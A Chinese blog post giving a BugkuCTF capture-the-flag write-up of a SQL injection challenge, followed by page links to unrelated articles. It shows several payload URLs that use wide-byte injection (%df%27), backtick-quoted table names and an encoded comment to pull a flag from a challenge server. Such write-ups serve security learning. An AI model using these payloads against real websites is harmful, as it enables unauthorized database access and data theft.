BugkuCTF sql注入

前言

写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~

点开链接一看

很明显可以看出查询key表,id=1的string字段

我们去构造payload:

http://103.238.227.13:10083/index.php?id=-1%20union%20select%201,string%20from%20%27key%27%20#

我们发现没有出来 ,诶,怎么什么都没有了 ,继续重头开始 ,看一下是什么注入

发现id=1和id=1’都没错,这时候我们想起了宽字节注入 ,试一下

果然是这个样子,有关宽字段的讲解可以参考这里

那么就好了构造payload:

http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from 'key'#

报错,我们可以知道是引号的问题 ,那试一下另一种引号

http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from `key`#

这种引号在tab键的上面

发现还报错 ,才想起来了可能是#的问题  把#改成%23试试看

http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from `key`%23

直接爆出了key,这应该是我们需要的flag

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏IT技术精选文摘

解Bug之路-记一次JVM堆外内存泄露Bug的查找

1433
来自专栏软件测试经验与教训

看图说话:持久式XSS(跨站)漏洞示例

读书与实践是获取知识的主要渠道,学习的权力只掌握在每个人自己手中,让学习成为一种生活的习惯,这比任何名牌大学的校徽重要得多!

2502
来自专栏北京马哥教育

4个Linux服务器监控工具

下面是我想呈现给你的4个强大的监控工具。 htop – 交互式进程查看器 你可能知道在机器上查看实时进程的标准工具top。如果不知道,请运行$ top看看,运行...

4309
来自专栏极客慕白的成长之路

GifCam – 简单好用的 GIF 动画录制软件

GifCam 是一款小而美的 GIF 录制软件。她拥有一个迷人的特点 —— 通过将软件置顶在所有窗口之上,你可以像相机一样调整录制区域,移动或缩放窗口。

972
来自专栏FreeBuf

DNS Tunneling及相关实现

*本文原创作者:novsec,本文属FreeBuf原创奖励计划,未经许可禁止转载 ? DNS Tunneling,是隐蔽信道的一种,通过将其他协议封装在DNS协...

7357
来自专栏惨绿少年

MongoDB 分片集群技术

---- 在了解分片集群之前,务必要先了解复制集技术! ----  1.1 MongoDB复制集简介   一组Mongodb复制集,就是一组mongod进程,...

5229
来自专栏along的开发之旅

adb shell 如何选择特定的设备?

其实这个一查,stackoverflow或者百度谷歌一大把,比如这个“http://stackoverflow.com/questions/14654718/h...

792
来自专栏Spark学习技巧

Spark Structured Streaming高级特性

一,事件时间窗口操作 使用Structured Streaming基于事件时间的滑动窗口的聚合操作是很简单的,很像分组聚合。在一个分组聚合操作中,聚合值被唯一保...

1.1K7
来自专栏解Bug之路

解Bug之路-串包Bug

笔者很热衷于解决Bug,同时比较擅长(网络/协议)部分,所以经常被唤去解决一些网络IO方面的Bug。现在就挑一个案例出来,写出分析思路,以飨读者,希望读者在以后...

881
来自专栏坚毅的PHP

hadoop学习笔记

map-reduce  原文:http://blademaster.ixiezi.com/2010/03/27/google-mapreduce%E4%B8%...

3957

扫码关注云+社区

领取腾讯云代金券